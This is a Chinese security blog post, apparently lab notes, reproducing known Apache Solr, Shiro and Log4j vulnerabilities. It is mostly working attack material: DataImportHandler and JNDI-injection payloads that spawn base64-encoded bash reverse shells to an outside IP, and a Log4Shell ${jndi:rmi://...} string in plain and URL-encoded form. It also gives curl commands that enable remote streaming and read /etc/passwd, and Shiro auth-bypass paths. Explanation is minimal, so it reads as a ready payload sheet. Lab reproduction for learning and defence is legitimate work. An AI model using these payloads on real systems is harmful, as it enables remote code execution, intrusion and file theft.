EthanDoctor

Solr搜索&Shiro身份&Log4j日志&本地CVE环境复现

Ethan医生4周前服务安全48

-Solr

主要基于HTTP和Apache Lucene实现的全文搜索服务器。

历史漏洞:https://avd.aliyun.com/search?q=Solr

黑盒特征:图标及端口8393

1、命令执行(CVE-2019-17558

Apache Solr 5.0.0版本至8.3.1

https://github.com/jas502n/solr_rce

D:\Python27\python.exe solr_rce.py http://123.58.236.76:50847 id


2、远程命令执行漏洞(CVE-2019-0193)

Apache Solr < 8.2.0版本

https://vulhub.org/#/environments/solr/CVE-2019-0193/

条件1Apache SolrDataImportHandler启用了模块DataImportHandler(默认不会被启用)

条件2Solr Admin UI未开启鉴权认证。(默认情况无需任何认证)

选择已有核心后选择Dataimport功能并选择debug模式,更改填入以下POC,

点击Execute with this Confuguration

<dataConfig>

  <dataSource type="URLDataSource"/>

  <script><![CDATA[

          function poc(){ java.lang.Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}");

          }

  ]]></script>

  <document>

    <entity name="stackoverflow"

            url="https://stackoverflow.com/feeds/tag/solr"

            processor="XPathEntityProcessor"

            forEach="/feed"

            transformer="script:poc" />

  </document>

</dataConfig>

3Apache Solr 文件读取&SSRF (CVE-2021-27905)

全版本官方拒绝修复漏洞

1、获取数据库名

http://47.94.236.117:8983/solr/admin/cores?indexInfo=false&wt=json

2、访问触发

curl -i -s -k -X $'POST' \

-H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \

$'http://47.94.236.117:8983/solr/demo/config'

3、任意文件读取

curl -i -s -k 'http://47.94.236.117:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'

 

-Shiro

Java安全框架,能够用于身份验证、授权、加密和会话管理。

历史漏洞:https://avd.aliyun.com/search?q=Shiro

黑盒特征:数据包cookie里面rememberMe

 

1、CVE_2016_4437 Shiro-550+Shiro-721

影响范围:Apache Shiro <= 1.2.4

工具箱利用项目搜哈

 

2、CVE-2020-11989

Poc/admin/%20

影响范围:Apache Shiro < 1.7.1

 

3、CVE-2020-1957

Poc/xxx/..;/admin/

影响范围:Apache Shiro < 1.5.3

 

4、CVE-2022-32532

Poc/permit/any

/permit/a%0any可绕过

需要依赖代码具体写法,无法自动化,风险较低。

影响范围:Apache Shiro < 1.9.1


-Log4j

Apache的一个开源项目,是一个基于Java的日志记录框架。

历史漏洞:https://avd.aliyun.com/search?q=Log4j

黑盒特征:盲打 会问蓝队攻击特征(${jndi:rmi:///osutj8})

 

Log4j2远程命令执行(CVE-2021-44228

漏洞影响的产品版本包括:

Apache Log4j2 2.0 - 2.15.0-rc1

1、生成反弹Shell的JNDI注入

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3Lzk5MDAgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 47.94.236.117

2、构造JNDI注入Payload提交

${jndi:rmi://47.94.236.117:1099/osutj8}

%24%7b%6a%6e%64%69%3a%72%6d%69%3a%2f%2f%34%37%2e%39%34%2e%32%33%36%2e%31%31%37%3a%31%30%39%39%2f%6f%73%75%74%6a%38%7d


标签: SolrShiroLog4j
返回列表

上一篇:XSS跨站&浏览器UXSS&突变MXSS&Vue&React框架&JQuery库&写法和版本

下一篇:开发组件安全&Jackson&FastJson各版本&XStream&CVE环境复现

相关文章

端口协议&桌面应用&QQ&WPS等RCE&hydra口令猜解&未授权检测

#端口协议-口令爆破&未授权参考:https://mp.weixin.qq.com/s/xp_LOUmGImrRmkPrDqxKjw-弱口令爆破https://github.com/vanha...

开发框架安全&SpringBoot&Struts2&Laravel&ThinkPHP&CVE复现

#PHP-框架安全-Thinkphp&Laravel#Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。1、CVE-2021-3129 RCELar...

云原生篇&Docker安全&系统内核&版本漏洞&CDK自动利用&容器逃逸

#云原生-Docker安全-容器逃逸&内核漏洞细节部分在权限提升章节会详解,常用:CVE-2016-5195 CVE-2019-16884 CVE-2021-3493CVE-2021-2255...

云服务篇&对象存储&Bucket桶&任意上传&域名接管&AccessKey泄漏

云服务,顾名思义就是云上服务,在云厂商上购买的产品服务。国内有阿里云、腾讯云、华为云、天翼云、Ucloud、金山云等,国外有亚马逊的AWS、Google的GCP、微软的Azure,IBM云等。&nbs...

云产品篇&堡垒机场景&JumpServer&绿盟SAS&Teleport&麒麟&齐治

云产品篇&堡垒机场景&JumpServer&绿盟SAS&Teleport&麒麟&齐治

堡垒机攻防:(意义)https://mp.weixin.qq.com/s/-WcgyVoTCZuPamVtI5MrJw堡垒机漏洞:(已知)https://avd.aliyun.com/search?q...

云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行

云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行

#K8S集群架构解释(见上图参考)Kubernetes是一个开源的,用于编排云平台中多个主机上的容器化的应用,目标是让部署容器化的应用能简单并且高效的使用, 提供了应用部署,规划,更新,维护的一种机制...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号